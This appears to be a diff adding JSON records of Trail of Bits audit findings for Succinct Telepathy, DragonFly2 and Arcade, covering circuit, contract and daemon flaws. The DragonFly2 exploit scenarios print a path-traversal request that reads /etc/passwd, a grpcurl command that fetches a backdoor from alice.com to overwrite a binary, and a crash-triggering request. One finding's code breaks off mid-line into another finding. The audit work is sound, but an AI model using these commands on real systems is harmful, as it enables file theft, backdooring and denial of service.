provers, using an attack such as that described in TOB-SUCCINCT-1 or an attack against the ochain prover/relayer client itself. Alice creates a forged beacon block with a new sync committee containing only her own public keys, then uses her 10 active committee keys to sign the block. She calls LightClient.rotate with this forged block and waits until the sync committee period ends, nally calling LightClient.force to gain control over all future light client updates. Recommendations Short term, consider removing the LightClient.force function, extending the waiting period before updates may be forced, or introducing a privileged role to mediate forced updates. Long term, explicitly document expected liveness behavior and associated safety tradeos.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "9. G1AddMany does not check for the point at innity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The G1AddMany circuit aggregates multiple public keys into a single public key before verifying the BLS signature. The outcome of the aggregation is used within CoreVerifyPubkeyG1 as the public key. However, G1AddMany ignores the value of the nal out_bits , and wrongly converts a point at innity to a dierent point when all participation bits are zero. template G1AddMany(SYNC_COMMITTEE_SIZE, LOG_2_SYNC_COMMITTEE_SIZE, N, K) { signal input pubkeys[SYNC_COMMITTEE_SIZE][ 2 ][K]; signal input bits[SYNC_COMMITTEE_SIZE]; signal output out[ 2 ][K]; [...] for ( var i = 0 ; i < 2 ; i++) { for ( var j = 0 ; j < K; j++) { out[i][j] <== reducers[LOG_2_SYNC_COMMITTEE_SIZE- 1 ].out[ 0 ][i][j]; } } } Figure 9.1: BLS key aggregation without checks for all-zero participation bits ( telepathy/circuits/circuits/bls.circom#1648 ) Recommendations Short term, augment the G1AddMany template with an output signal that indicates whether the aggregated public key is the point at innity. Check that the aggregated public key is non-zero in the calling circuit by verifying that the output of G1AddMany is not the point at innity (for instance, in VerifySyncCommitteeSignature ). Long term, assert that all provided elliptic curve points are non-zero before converting them to ane form and using them where a non-zero point is expected.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "10. TargetAMB receipt proof may behave unexpectedly on future transaction types ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The TargetAMB contract can relay transactions from the SourceAMB via events logged in transaction receipts. The contract currently ignores the version specier in these receipts, which could cause unexpected behavior in future upgrade hard-forks. To relay a transaction from a receipt, the user provides a Merkle proof that a particular transaction receipt is present in a specied block; the relevant event is then parsed from the transaction receipt by the TargetAMB . function getEventTopic (...){ ... bytes memory value = MerklePatriciaProofVerifier.extractProofValue(receiptRoot, key, proofAsRLP); RLPReader.RLPItem memory valueAsItem = value.toRlpItem(); if (!valueAsItem.isList()) { // TODO: why do we do this ... valueAsItem.memPtr++; valueAsItem.len--; } RLPReader.RLPItem[] memory valueAsList = valueAsItem.toList(); require (valueAsList.length == 4 , \"Invalid receipt length\" ); // In the receipt, the 4th entry is the logs RLPReader.RLPItem[] memory logs = valueAsList[ 3 ].toList(); require (logIndex < logs.length, \"Log index out of bounds\" ); RLPReader.RLPItem[] memory relevantLog = logs[logIndex].toList(); ... } Figure 10.1: telepathy/contracts/src/libraries/StateProofHelper.sol#L44L82 The logic in gure 10.1 checks if the transaction receipt is an RLP list; if it is not, the logic skips one byte of the receipt before continuing with parsing. This logic is required in order to properly handle legacy transaction receipts as dened in EIP-2718 . Legacy transaction receipts directly contain the RLP-encoded list rlp([status, cumulativeGasUsed, logsBloom, logs]) , whereas EIP- TransactionType|| TransactionPayload , where TransactionType is a one-byte indicator between 0x00 and 0x7f and TransactionPayload may vary depending on the transaction type. Current valid transaction types are 0x01 and 0x02 . New transaction types may be added during routine Ethereum upgrade hard-forks. The TransactionPayload eld of type 0x01 and 0x02 transactions corresponds exactly to the LegacyTransactionReceipt format; thus, simply skipping the initial byte is sucient to handle these cases. However, EIP-2718 does not guarantee this backward compatibility, and future hard-forks may introduce transaction types for which this parsing method gives incorrect results. Because the current implementation lacks explicit validation of the transaction type, this discrepancy may go unnoticed and lead to unexpected behavior. Exploit Scenario An Ethereum upgrade fork introduces a new transaction type with a corresponding transaction receipt format that diers from the legacy format. If the new format has the same number of elds but with dierent semantics in the fourth slot, it may be possible for a malicious user to insert into that slot a value that parses as an event log for a transaction that did not take place, thus forging an arbitrary bridge message. Recommendations Short term, check the rst byte of valueAsItem against a list of allowlisted transaction types, and revert if the transaction type is invalid. Long term, plan for future incompatibilities due to upgrade forks; for example, consider adding a semi-trusted role responsible for adding new transaction type identiers to an allowlist.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "11. RLPReader library does not validate proper RLP encoding ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The TargetAMB uses the external RLPReader dependency to parse RLP-encoded nodes in the Ethereum state trie, including those provided by the user as part of a Merkle proof. When parsing a byte string as an RLPItem , the library does not check that the encoded payload length of the RLPitem matches the length of the underlying bytes. /* * @param item RLP encoded bytes */ function toRlpItem ( bytes memory item) internal pure returns (RLPItem memory ) { uint256 memPtr ; assembly { memPtr := add(item, 0x20 ) } return RLPItem(item.length, memPtr); } Figure 11.1: Solidity-RLP/contracts/RLPReader.sol#5161 If the encoded byte length of the RLPitem is too long or too short, future operations on the RLPItem may access memory before or after the bounds of the underlying buer. More generally, because the Merkle trie verier assumes that all input is in the form of valid RLP-encoded data, it is important to check that potentially malicious data is properly encoded. While we did not identify any way to convert improperly encoded proof data into a proof forgery, it is simple to give an example of an out-of-bounds read that could possibly lead in other contexts to unexpected behavior. In gure 11.2, the result of items[0].toBytes() contains many bytes read from memory beyond the bounds allocated in the initial byte string. RLPReader.RLPItem memory item = RLPReader.toRlpItem( '\\xc3\\xd0' ); RLPReader.RLPItem[] memory items = item.toList(); assert(items[ 0 ].toBytes().length == 16 ); Figure 11.2: Out-of-of-bounds read due to invalid RLP encoding In this example, RLPReader.toRLPItem should revert because the encoded length of three bytes is longer than the payload length of the string; similarly, the call to toList() should fail because the nested RLPItem encodes a length of 16, again more than the underlying buer. To prevent such ill-constructed nested RLPItem s, the internal numItems function should revert if currPtr is not exactly equal to endPtr at the end of the loop shown in gure 11.3. // @return number of payload items inside an encoded list. function numItems (RLPItem memory item) private pure returns ( uint256 ) { if (item.len == 0 ) return 0 ; uint256 count = 0 ; uint256 currPtr = item.memPtr + _payloadOffset(item.memPtr); uint256 endPtr = item.memPtr + item.len; while (currPtr < endPtr) { currPtr = currPtr + _itemLength(currPtr); // skip over an item count++; } return count; } Figure 11.3: Solidity-RLP/contracts/RLPReader.sol#256269 Recommendations Short term, add a check in RLPReader.toRLPItem that validates that the length of the argument exactly matches the expected length of prex + payload based on the encoded prex. Similarly, add a check in RLPReader.numItems , checking that the sum of the encoded lengths of sub-objects matches the total length of the RLP list. Long term, treat any length values or pointers in untrusted data as potentially malicious and carefully check that they are within the expected bounds.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "12. TargetAMB _executeMessage lacks contract existence checks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "When relaying messages on the target chain, the TargetAMB records the success or failure of the external contract call so that o-chain clients can track the success of their messages. However, if the recipient of the call is an externally owned-account or is otherwise empty, the handleTelepathy call will appear to have succeeded when it was not processed by any recipient. bytes memory recieveCall = abi.encodeWithSelector( ITelepathyHandler.handleTelepathy.selector, message.sourceChainId, message.senderAddress, message.data ); address recipient = TypeCasts.bytes32ToAddress(message.recipientAddress); (status,) = recipient.call(recieveCall); if (status) { messageStatus[messageRoot] = MessageStatus.EXECUTION_SUCCEEDED; } else { messageStatus[messageRoot] = MessageStatus.EXECUTION_FAILED; } Figure 12.1: telepathy/contracts/src/amb/TargetAMB.sol#150164 Exploit Scenario A user accidentally sends a transaction to the wrong address or an address that does not exist on the target chain. The UI displays the transaction as successful, possibly confusing the user further. Recommendations Short term, change the handleTelepathy interface to expect a return value and check that the return value is some magic constant, such as the four-byte ABI selector. See OpenZeppelins safeTransferFrom / IERC721Reciever pattern for an example. Long term, ensure that all low-level calls behave as expected when handling externally owned accounts.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "13. LightClient is unable to verify some block headers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The LightClient contract expects beacon block headers produced in a period prior to the period in which they are nalized to be signed by the wrong sync committee; those blocks will not be validated by the LightClient , and AMB transactions in these blocks may be delayed. The Telepathy light client tracks only block headers that are nalized, as dened by the ETH2.0 Casper nality mechanism. Newly proposed, unnalized beacon blocks contain a finalized_checkpoint eld with the most recently nalized block hash. The Step circuit currently exports only the slot number of this nested, nalized block as a public input. The LightClient contract uses this slot number to determine which sync committee it expects to sign the update. However, the correct slot number for this use is in fact that of the wrapping, unnalized block. In some cases, such as near the edge of a sync committee period or during periods of delayed nalization, the two slots may not belong to the same sync committee period. In this case, the signature will fail to verify, and the LightClient will become unable to validate the block header. Exploit Scenario A user sends an AMB message using the SourceAMB.sendViaLog function. The beacon block in which this execution block is included is late within a sync committee period and is not nalized on the beacon chain until the next period. The new sync committee signs the block, but this signature is rejected by the light client because it expects a signature from the old committee. Because this header cannot be nalized in the light client, the TargetAMB cannot relay the message until some future block in the new sync committee period is nalized in the light client, causing delivery delays. Recommendations Short term, Include attestedSlot in the public input commitment to the Step circuit. This can be achieved at no extra cost by packing the eight-byte attestedSlot value alongside the eight-byte finalizedSlot value, which currently is padded to 32 bytes. Long term, add additional unit and end-to-end tests to focus on cases where blocks are near the edges of epochs and sync committee periods. Further, reduce gas usage and circuit complexity by packing all public inputs to the step function into a single byte array that is hashed in one pass, rather than chaining successive calls to SHA-256, which reduces the eective rate by half and incurs overhead due to the additional external precompile calls.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "14. OptSimpleSWU2 Y-coordinate output is underconstrained ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The OptSimpleSWU2 circuit does not check that its Y-coordinate output is a properly formatted BigInt. This violates the canonicity assumptions of the Fp2Sgn0 circuit and other downstream components, possibly leading to unexpected nondeterminism in the sign of the output of MapToG2 . Incorrect results from MapToG2 would cause the circuit to verify the provided signature against a message dierent from that in the public input. While this does not allow malicious provers to forge signatures on arbitrary messages, this additional degree of freedom in witness generation could interact negatively with future changes to the codebase or instantiations of this circuit. var Y[2][50]; ... component Y_sq = Fp2Multiply(n, k, p); // Y^ 2 == g(X) for ( var i= 0 ; i< 2 ; i++) for ( var idx= 0 ; idx/?peerId=172.17.0.1-1- HTTP / 1.1 Host: $BOB_IP:55002 Range: bytes=0-100 Figure 12.7: Bobs response, revealing /etc/passwd contents Later, Alice uploads a malicious backdoor executable to the peer-to-peer network. Once Bob has downloaded (e.g., via the exportFromPeers method) and cached the backdoor le, Alice sends a request like the one shown in gure 12.8 to overwrite the /opt/dragonfly/bin/dfget binary with the backdoor. grpcurl -plaintext -format json -d \\ '{\"url\":\"http://alice.com/backdoor\", \"output\":\"/opt/dragonfly/bin/dfget\", \"urlMeta\":{\"digest\": \"md5:aaaff\", \"tag\":\"tob\"}}' $BOB_IP:65000 dfdaemon.Daemon.ExportTask Figure 12.8: Command to overwrite dfget binary After some time Bob restarts the dfget daemon, which executes Alices backdoor on his machine. Recommendations Short term, sandbox the DragonFly2 daemon, so that it can access only les within a certain directory. Mitigate path traversal attacks. Ensure that APIs exposed by peers cannot be used by malicious actors to gain arbitrary le read or write, code execution, HTTP request forgery, and other unintended capabilities.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "13. Manager generates mTLS certicates for arbitrary IP addresses ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "A peer can obtain a valid TLS certicate for arbitrary IP addresses, eectively rendering the mTLS authentication useless. The issue is that the Managers Certificate gRPC service does not validate if the requested IP addresses belong to the peer requesting the certicatethat is, if the peer connects from the same IP address as the one provided in the certicate request. Please note that the issue is known to developers and marked with TODO comments, as shown in gure 13.1. if addr, ok := p.Addr.(*net.TCPAddr); ok { ip = addr.IP.String() } else { ip, _, err = net.SplitHostPort(p.Addr.String()) if err != nil { return nil , err } } // Parse csr. [skipped] // Check csr signature. // TODO check csr common name and so on. if err = csr.CheckSignature(); err != nil { return nil , err } [skipped] // TODO only valid for peer ip // BTW we need support both of ipv4 and ipv6. ips := csr.IPAddresses if len (ips) == 0 { // Add default connected ip. ips = []net.IP{net.ParseIP(ip)} } Figure 13.1: The Managers Certificate gRPC handler for the IssueCertificate endpoint ( Dragonfly2/manager/rpcserver/security_server_v1.go#6598 ) Recommendations Short term, implement the missing IP addresses validation in the IssueCertificate endpoint of the Managers Certificate gRPC service. Ensure that a peer cannot obtain a certicate with an ID that does not belong to the peer. Long term, research common security problems in PKI infrastructures and ensure that DragonFly2s PKI does not have them. Ensure that if a peer IP address changes, the certicates issued for that IP are revoked.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "14. gRPC requests are weakly validated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The gRPC requests are weakly validated, and some requests elds are not validated at all. For example, the ImportTaskRequest s url_meta eld is not validated and may be missing from a request (see gure 14.1). Sending requests to the ImportTask endpoint (as shown in gure 14.2) triggers the code shown in gure 14.3. The highlighted call to the logger accesses the req.UrlMeta.Tag variable, causing a nil dereference panic (because the req.UrlMeta variable is nil ). message ImportTaskRequest { // Download url. string url = 1 [(validate.rules). string .min_len = 1 ]; // URL meta info. common.UrlMeta url_meta = 2 ; // File to be imported. string path = 3 [(validate.rules). string .min_len = 1 ]; // Task type. common.TaskType type = 4 ; } Figure 14.1: ImportTaskRequest denition, with the url_meta eld missing any validation rules ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#7685 ) grpcurl -plaintext -format json -d \\ '{\"url\":\"http://example.com\", \"path\":\"x\"}' $PEER_IP:65000 dfdaemon.Daemon.ImportTask Figure 14.2: An example command that triggers panic in the daemon gRPC server s.Keep() peerID := idgen.PeerIDV1(s.peerHost.Ip) taskID := idgen.TaskIDV1(req.Url, req.UrlMeta) log := logger.With( \"function\" , \"ImportTask\" , \"URL\" , req.Url, \"Tag\" , req.UrlMeta.Tag, \"taskID\" , taskID, \"file\" , req.Path) Figure 14.3: The req.UrlMeta variable may be nil ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#871874 ) Another example of weak validation can be observed in the denition of the UrlMeta request (gure 14.4). The digest eld of the request should contain a prex followed by an either MD5 or SHA256 hex-encoded hash. While prex and hex-encoding is validated, length of the hash is not. The length is validated only during the parsing . // UrlMeta describes url meta info. message UrlMeta { // Digest checks integrity of url content, for example md5:xxx or sha256:yyy. string digest = 1 [(validate.rules). string = {pattern: \"^(md5)|(sha256):[A-Fa-f0-9]+$\" , ignore_empty: true }]; Figure 14.4: The UrlMeta request denition, with a regex validation of the digest eld ( api/pkg/apis/common/v1/common.proto#163166 ) Recommendations Short term, add missing validations for the ImportTaskRequest and UrlMeta messages. Centralize validation of external inputs, so that it is easy to understand what properties are enforced on the data. Validate data as early as possible (for example, in the proto-related code). Long term, use fuzz testing to detect missing validations.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "15. Weak integrity checks for downloaded les ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The DragonFly2 uses a variety of hash functions, including the MD5 hash. This algorithm does not provide collision resistance; it is secure only against preimage attacks. While these security guarantees may be enough for the DragonFly2 system, it is not completely clear if there are any scenarios where lack of the collision resistance would compromise the system. There are no clear benets to keeping the MD5 hash function in the system. Figure 15.1 shows the core validation method that protects the integrity of les downloaded from the peer-to-peer network. As shown in the gure, the hash of a le (sha256) is computed over hashes of all les pieces (MD5). So the security provided by the more secure sha256 hash is lost, because of use of the MD5. var pieceDigests [] string for i := int32 ( 0 ); i < t.TotalPieces; i++ { pieceDigests = append (pieceDigests, t.Pieces[i].Md5) } digest := digest.SHA256FromStrings(pieceDigests...) if digest != t.PieceMd5Sign { t.Errorf( \"invalid digest, desired: %s, actual: %s\" , t.PieceMd5Sign, digest) t.invalid.Store( true ) return ErrInvalidDigest } Figure 15.1: Part of the method responsible for validation of les integrity ( Dragonfly2/client/daemon/storage/local_storage.go#255265 ) The MD5 algorithm is hard coded over the entire codebase (e.g., gure 15.2), but in some places the hash algorithm is congurable (e.g., gure 15.3). Further investigation is required to determine whether an attacker can exploit the congurability of the system to perform downgrade attacksthat is, to downgrade the security of the system by forcing users to use the MD5 algorithm, even when a more secure option is available. reader, err = digest.NewReader( digest.AlgorithmMD5 , io.LimitReader(resp.Body, int64 (req.piece.RangeSize)), digest.WithEncoded(req.piece.PieceMd5), digest.WithLogger(req.log)) Figure 15.2: Hardcoded hash function ( Dragonfly2/client/daemon/peer/piece_downloader.go#188 ) switch algorithm { case AlgorithmSHA1: if len (encoded) != 40 { return nil , errors.New( \"invalid encoded\" ) } case AlgorithmSHA256: if len (encoded) != 64 { return nil , errors.New( \"invalid encoded\" ) } case AlgorithmSHA512: if len (encoded) != 128 { return nil , errors.New( \"invalid encoded\" ) } case AlgorithmMD5: if len (encoded) != 32 { return nil , errors.New( \"invalid encoded\" ) } default : return nil , errors.New( \"invalid algorithm\" ) } Figure 15.3: User-congurable hash function ( Dragonfly2/pkg/digest/digest.go#111130 ) Moreover, there are missing validations of the integrity hashes, for example in the ImportTask method (gure 15.5). // TODO: compute and check hash digest if digest exists in ImportTaskRequest Figure 15.4: Missing hash validation ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#904 ) Exploit Scenario Alice, a peer in the DragonFly2 system, creates two images: an innocent one, and one with malicious code. Both images consist of two pieces, and Alice generates the pieces so that their respective MD5 hashes collide (are the same). Therefore, the PieceMd5Sign metadata of both images are equal. Alice shares the innocent image with other peers, who attest to their validity (i.e., that it works as expected and is not malicious). Bob wants to download the image and requests it from the peer-to-peer network. After downloading the image, Bob checks its integrity with a SHA256 hash that is known to him. Alice, who is participating in the network, had already provided Bob the other image, the malicious one. Bob unintentionally uses the malicious image. Recommendations Short term, remove support for the MD5. Always use SHA256, SHA3, or another secure hashing algorithm. Long term, take an inventory of all cryptographic algorithms used across the entire system. Ensure that no deprecated or non-recommended algorithms are used.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "16. Invalid error handling, missing return statement ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "There are two instances of a missing return statement inside an if branch that handles an error from a downstream method. The rst issue is in the UpdateTransportOption function, where failed parsing of the Proxy option prints an error, but does not terminate execution of the UpdateTransportOption function. func UpdateTransportOption(transport *http.Transport, optionYaml [] byte ) error { [skipped] if len (opt.Proxy) > 0 { proxy, err := url.Parse(opt.Proxy) if err != nil { fmt.Printf( \"proxy parse error: %s\\n\" , err) } transport.Proxy = http.ProxyURL(proxy) } Figure 16.1: the UpdateTransportOption function ( Dragonfly2/pkg/source/transport_option.go#4558 ) The second issue is in the GetV1Preheat method, where failed parsing of the rawID argument does not result in termination of the method execution. Instead, the id variable will be assigned either the zero or max_uint value. func (s *service) GetV1Preheat(ctx context.Context, rawID string ) (*types.GetV1PreheatResponse, error ) { id, err := strconv.ParseUint(rawID, 10 , 32 ) if err != nil { logger.Errorf( \"preheat convert error\" , err) } Figure 16.2: the GetV1Preheat function ( Dragonfly2/manager/service/preheat.go#6670 ) Recommendations Short term, add the missing return statements in the UpdateTransportOption method. Long term, use static analysis to detect similar bugs.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "17. Tiny le download uses hard coded HTTP protocol ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The code in the scheduler for downloading a tiny le is hard coded to use the HTTP protocol, rather than HTTPS. This means that an attacker could perform a Man-in-the-Middle attack, changing the network request so that a dierent piece of data gets downloaded. Due to the use of weak integrity checks ( TOB-DF2-15 ), this modication of the data may go unnoticed. // DownloadTinyFile downloads tiny file from peer without range. func (p *Peer) DownloadTinyFile() ([] byte , error ) { ctx, cancel := context.WithTimeout(context.Background(), downloadTinyFileContextTimeout) defer cancel() // Download url: http://${host}:${port}/download/${taskIndex}/${taskID}?peerId=${peerID} targetURL := url.URL{ Scheme: Host: Path: RawQuery: fmt.Sprintf( \"peerId=%s\" , p.ID), \"http\" , fmt.Sprintf( \"%s:%d\" , p.Host.IP, p.Host.DownloadPort), fmt.Sprintf( \"download/%s/%s\" , p.Task.ID[: 3 ], p.Task.ID), } Figure 17.1: Hard-coded use of HTTP ( Dragonfly2/scheduler/resource/peer.go#435446 ) Exploit Scenario A network-level attacker who cannot join a peer-to-peer network performs a Man-in-the-Middle attack on peers. The adversary can do this because peers (partially) communicate over plaintext HTTP protocol. The attack chains this vulnerability with the one described in TOB-DF2-15 to replace correct les with malicious ones. Unconscious peers use the malicious les. Recommendations Short term, add a conguration option to use HTTPS for these downloads. Long term, audit the rest of the repository for other hard-coded uses of HTTP.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "18. Incorrect log message ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The scheduler service may sometimes output two dierent logging messages stating two dierent reasons why a task is being registered as a normal task. The following code is used to register a peer and trigger a seed peer download task. // RegisterPeerTask registers peer and triggers seed peer download task. func (v *V1) RegisterPeerTask(ctx context.Context, req *schedulerv1.PeerTaskRequest) (*schedulerv1.RegisterResult, error ) { [skipped] // The task state is TaskStateSucceeded and SizeScope is not invalid. switch sizeScope { case commonv1.SizeScope_EMPTY: [skipped] case commonv1.SizeScope_TINY: // Validate data of direct piece. if !peer.Task.CanReuseDirectPiece() { direct piece is %d, content length is %d\" , len (task.DirectPiece), task.ContentLength.Load()) peer.Log.Warnf( \"register as normal task, because of length of break } result, err := v.registerTinyTask(ctx, peer) if err != nil { peer.Log.Warnf( \"register as normal task, because of %s\" , err.Error()) break } return result, nil case commonv1.SizeScope_SMALL: result, err := v.registerSmallTask(ctx, peer) if err != nil { peer.Log.Warnf( \"register as normal task, because of %s\" , err.Error()) break } return result, nil } result, err := v.registerNormalTask(ctx, peer) if err != nil { peer.Log.Error(err) v.handleRegisterFailure(ctx, peer) return nil , dferrors.New(commonv1.Code_SchedError, err.Error()) } peer.Log.Info( \"register as normal task, because of invalid size scope\" ) return result, nil } Figure 18.1: Code snippet with incorrect logging ( Dragonfly2/scheduler/service/service_v1.go#93173 ) Each of the highlighted sets of lines above print register as normal task, because [reason], before exiting from the switch statement. Then, the task is registered as a normal task. Finally, another message is logged: register as normal task, because of invalid size scope. This means that two dierent messages may be printed (one as a warning message, one as an informational message) with two contradicting reasons for why the task was registered as a normal task. This does not cause any security problems directly but may lead to diculties while managing a DragonFly system or debugging DragonFly code. Recommendations Short term, move the peer.Log.Info function call into a default branch in the switch statement so that it is called only when the size scope is invalid.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "3. Manager makes requests to external endpoints with disabled TLS authentication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The Manager disables TLS certicate verication in two HTTP clients (gures 3.1 and 3.2). The clients are not congurable, so users have no way to re-enable the verication. func getAuthToken(ctx context.Context, header http.Header) ( string , error ) { [skipped] client := &http.Client{ Timeout: defaultHTTPRequesttimeout, Transport: &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, }, } [skipped] } Figure 3.1: getAuthToken function with disabled TLS certicate verication ( Dragonfly2/manager/job/preheat.go#261301 ) func (p *preheat) getManifests(ctx context.Context, url string , header http.Header) (*http.Response, error ) { [skipped] client := &http.Client{ Timeout: defaultHTTPRequesttimeout, Transport: &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, }, } [skipped] } Figure 3.2: getManifests function with disabled TLS certicate verication ( Dragonfly2/manager/job/preheat.go#211233 ) Exploit Scenario A Manager processes dozens of preheat jobs. An adversary performs a network-level Man-in-the-Middle attack, providing invalid data to the Manager. The Manager preheats with the wrong data, which later causes a denial of service and le integrity problems. Recommendations Short term, make the TLS certicate verication congurable in the getManifests and getAuthToken methods. Preferably, enable the verication by default. Long term, enumerate all HTTP, gRPC, and possibly other clients that use TLS and document their congurable and non-congurable (hard-coded) settings. Ensure that all security-relevant settings are congurable or set to secure defaults. Keep the list up to date with the code.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "4. Incorrect handling of a task structures usedTra\u0000c eld ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The processPieceFromSource method (gure 4.1) is part of a task processing mechanism. The method writes pieces of data to storage, updating a Task structure along the way. The method does not update the structures usedTraffic eld, because an uninitialized variable n is used as a guard to the AddTraffic method call, instead of the result.Size variable. var n int64 result.Size, err = pt.GetStorage().WritePiece( [skipped] ) result.FinishTime = time.Now().UnixNano() if n > 0 { pt.AddTraffic( uint64 (n)) } Figure 4.1: Part of the processPieceFromSource method with a bug ( Dragonfly2/client/daemon/peer/piece_manager.go#264290 ) Exploit Scenario A task is processed by a peer. The usedTraffic metadata is not updated during the processing. Rate limiting is incorrectly applied, leading to a denial-of-service condition for the peer. Recommendations Short term, replace the n variable with the result.Size variable in the processPieceFromSource method. Long term, add tests for checking if all Task structure elds are correctly updated during task processing. Add similar tests for other structures.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "19. Usage of architecture-dependent int type ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The DragonFly2 uses int and uint numeric types in its golang codebase. These types bit sizes are either 32 or 64 bits, depending on the hardware where the code is executed. Because of that, DragonFly2 components running on dierent architectures may behave dierently. These discrepancies in behavior may lead to unexpected crashes of some components or incorrect data handling. For example, the handlePeerSuccess method casts peer.Task.ContentLength variable to the int type. Schedulers running on dierent machines may behave dierently, because of this behavior. if len (data) != int (peer.Task.ContentLength.Load()) { peer.Log.Errorf( \"download tiny task length of data is %d, task content length is %d\" , len (data), peer.Task.ContentLength.Load()) return } Figure 19.1: example use of architecture-dependent int type ( Dragonfly2/scheduler/service/service_v1.go#12401243 ) Recommendations Short term, use a xed bit size for all integer values. Alternatively, ensure that using the int type will not impact any computing where results must agree on all participants computers. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "2. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "Arcade has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler, the optional optimizations may not be safe. 147 148 149 150 optimizer: { enabled: optimizerEnabled, runs: 200, }, Figure 2.1: The solc optimizer settings in arcade-protocol/hardhat.config.ts High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018; the x for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. Another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that future optimizations will introduce new bugs. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-jscauses a security vulnerability in the Arcade contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. 25 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: High" + ] + }, + { + "title": "3. callApprove does not follow approval best practices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero. However, this behavior is not documented, and it might break the protocols integration with third-party contracts or o-chain components. 282 283 284 285 286 287 288 289 290 291 292 293 294 295 37 38 39 40 41 42 function callApprove( address token, address spender, uint256 amount ) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant { if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) { revert AV_NonWhitelistedApproval(token, spender); } // Do approval IERC20(token).safeApprove(spender, amount); emit Approve(msg.sender, token, spender, amount); } Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. 26 Arcade.xyz V3 Security Assessment */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { 43 44 45 46 47 48 49 50 51 52 53 54 55 56 spender, value)); 57 } // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 